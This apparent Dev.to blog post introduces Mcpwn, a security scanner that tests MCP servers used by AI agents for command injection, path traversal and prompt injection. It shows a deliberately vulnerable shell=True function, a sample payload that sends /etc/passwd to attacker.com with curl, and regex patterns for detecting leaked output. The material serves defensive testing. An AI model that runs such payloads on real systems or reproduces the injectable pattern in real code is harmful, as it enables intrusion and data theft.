Building a Security Scanner for MCP Servers
Source: Dev.to
Introduction
Model Context Protocol (MCP) is Anthropic’s new standard for connecting AI agents to external tools and data sources. While working with MCP servers I noticed a critical gap: there is no automated security testing for them.
MCP servers grant AI agents powerful capabilities such as file operations, command execution, and database access. A single vulnerable tool can lead to full system compromise, and manual code reviews often miss injection vulnerabilities in tool arguments.
Vulnerability Example
def execute_command(command: str):
return subprocess.run(command, shell=True, capture_output=True)The vulnerability lies in the unsanitized command argument. An AI agent could inject malicious payloads, e.g.:
ls; curl http://attacker.com/exfil?data=$(cat /etc/passwd)Mcpwn – Automated Security Scanner for MCP Servers
Mcpwn is a pure‑Python scanner that detects runtime vulnerabilities in MCP servers. Its name is a play on “MCP pwn”.
Semantic Detection Over Crash Detection
Instead of looking for crashes, Mcpwn analyzes response content for known patterns:
uid=1000(user)→ Command injectionroot:x:0:0:root→ Path traversal / file read-----BEGIN PRIVATE KEY→ Private key leakage- Timing deviations → Blind injection
Zero Dependencies
- Implemented using only the Python standard library.
- No
pip installrequired, simplifying CI/CD integration and reducing the attack surface.
Structured Output
Mcpwn can emit findings in JSON and SARIF formats, making it easy to consume by AI tools or CI pipelines.
{
"summary": {
"total": 3,
"by_severity": { "CRITICAL": 2, "HIGH": 1 }
},
"findings": [ /* ... */ ]
}Core Components
core/
├── pentester.py # Orchestrator (thread‑safe, timeout handling)
├── detector.py # Semantic detection engine
└── reporter.py # JSON/HTML/SARIF report generationImplemented Checks
- Tool argument injection (RCE, path traversal)
- Resource path traversal
- Prompt injection (context confusion, delimiter breakout)
- Protocol fuzzing (malformed JSON‑RPC)
- State desynchronization attacks
- Resource exhaustion
Detection Example
import re
def detect_rce(response: str) -> bool:
patterns = [
r'uid=\d+\([^)]+\)', # Unix user ID
r'gid=\d+\([^)]+\)', # Unix group ID
r'root:x:0:0:root' # /etc/passwd entry
]
return any(re.search(p, response) for p in patterns)During testing, Mcpwn uncovered RCE vulnerabilities in production MCP servers that manual reviews had missed.
Sample Scan Output
$ python mcpwn.py --quick npx -y @modelcontextprotocol/server-filesystem /tmp
[INFO] Found 2 tools, 0 resources
[WARNING] execute_command: RCE via command
[WARNING] Detection: uid=1000(user) gid=1000(user)
[INFO] Mcpwn completeUsage
Quick Scan (≈5 seconds)
python mcpwn.py --quick npx -y @modelcontextprotocol/server-filesystem /tmpGenerate JSON Report
python mcpwn.py --output-json report.json CI/CD Integration (SARIF)
python mcpwn.py --output-sarif report.sarif Design Considerations
- Semantic detection beats crash detection – pattern matching finds data leaks that don’t cause crashes.
- Thread safety – MCP servers handle concurrent requests; Mcpwn uses proper locking for request IDs and health checks.
- Timeouts everywhere – default 10 s timeout, configurable; quick mode uses 5 s to avoid hangs.
- False‑positive mitigation – e.g., path traversal detection requires two or more markers before raising an alert.
Planned Features
- SSRF injection detection
- Deserialization attack testing
- Schema pollution checks
- Authentication bypass testing
Current Limitations
- Does not detect configuration issues such as exposed credentials.
- Misses business‑logic flaws and complex multi‑step attack chains.
- Focuses on runtime exploit patterns; manual review is still needed for logic errors.
Getting Started
git clone https://github.com/Teycir/Mcpwn.git
cd Mcpwn
python3 mcpwn.py --helpMcpwn is MIT‑licensed, includes 45 passing tests, and requires zero external dependencies.
GitHub: https://github.com/Teycir/Mcpwn
Discussion
What security testing approaches have you found effective for AI‑agent infrastructure? Feel free to share your thoughts.